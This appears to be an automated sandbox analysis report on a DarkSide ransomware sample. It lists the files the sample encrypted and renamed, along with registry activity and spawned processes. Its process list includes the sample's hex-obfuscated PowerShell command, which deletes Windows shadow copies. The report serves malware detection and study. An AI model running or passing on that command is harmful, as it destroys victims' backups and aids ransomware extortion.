Analysis Overview
SHA256: 9cee5522a7ca2bfca7cd3d9daba23e9a30deb6205f56c12045839075f7627297
Threat Level: Known bad
The file DarkSide_18_11_2020_17KB.exe was found to be: Known bad.
Malicious Activity Summary
DarkSide
Modifies extensions of user files
UPX packed file
Reads user/profile data of web browsers
Looks up external IP address via web service
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Modifies registry class
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported: 2022-01-19 04:04
Signatures
UPX packed file
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2022-01-19 04:04
Reported: 2022-01-19 04:07
Platform: win10v2004-en-20220112
Max time kernel: 143s
Max time network: 154s
Command Line
Signatures
DarkSide
Modifies extensions of user files
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Users\Admin\Pictures\OptimizeUnblock.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RegisterResume.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\SubmitWrite.tif => C:\Users\Admin\Pictures\SubmitWrite.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\WaitSkip.tif => C:\Users\Admin\Pictures\WaitSkip.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromExit.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DenyAssert.png => C:\Users\Admin\Pictures\DenyAssert.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DenyAssert.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GroupReset.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\DenyUninstall.png => C:\Users\Admin\Pictures\DenyUninstall.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\GetDebug.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\PingEnable.tiff => C:\Users\Admin\Pictures\PingEnable.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\UnregisterGrant.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromExit.tif => C:\Users\Admin\Pictures\ConvertFromExit.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\DenyUninstall.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GetDebug.tif => C:\Users\Admin\Pictures\GetDebug.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PingEnable.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\WaitSkip.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\CheckpointApprove.crw => C:\Users\Admin\Pictures\CheckpointApprove.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromAdd.tiff | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\ConvertFromAdd.tiff => C:\Users\Admin\Pictures\ConvertFromAdd.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\ConvertFromAdd.tiff.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RestoreRestart.raw => C:\Users\Admin\Pictures\RestoreRestart.raw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\UnregisterGrant.crw => C:\Users\Admin\Pictures\UnregisterGrant.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\CheckpointApprove.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\GroupReset.crw => C:\Users\Admin\Pictures\GroupReset.crw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\OptimizeUnblock.tif => C:\Users\Admin\Pictures\OptimizeUnblock.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\PingEnable.tiff | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File renamed | C:\Users\Admin\Pictures\RegisterResume.png => C:\Users\Admin\Pictures\RegisterResume.png.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\RestoreRestart.raw.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\SubmitWrite.tif.abc0e8b2 | C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | www.iplocation.net | N/A | N/A |
| N/A | www.iplocation.net | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{770F1BB0-78E5-11EC-82D0-DA616A59BCB7} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe
"C:\Users\Admin\AppData\Local\Temp\DarkSide_18_11_2020_17KB.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\Desktop\NewSend.xls"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\SubmitRename.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\SubmitRename.hta
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3840 CREDAT:17410 /prefetch:2
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Documents\These.docx" /o ""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7f44f50,0x7ffcc7f44f60,0x7ffcc7f44f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1704 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2012 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc7f44f50,0x7ffcc7f44f60,0x7ffcc7f44f70
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2904 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2924 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4628 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4576 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4572 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4968 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5576 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5080 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3924 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3900 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5676 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5668 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5708 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5968 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5984 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x420 0x2ec
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4816 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6268 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2748 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=812 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1580,14767612198796923249,10682103941962591342,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
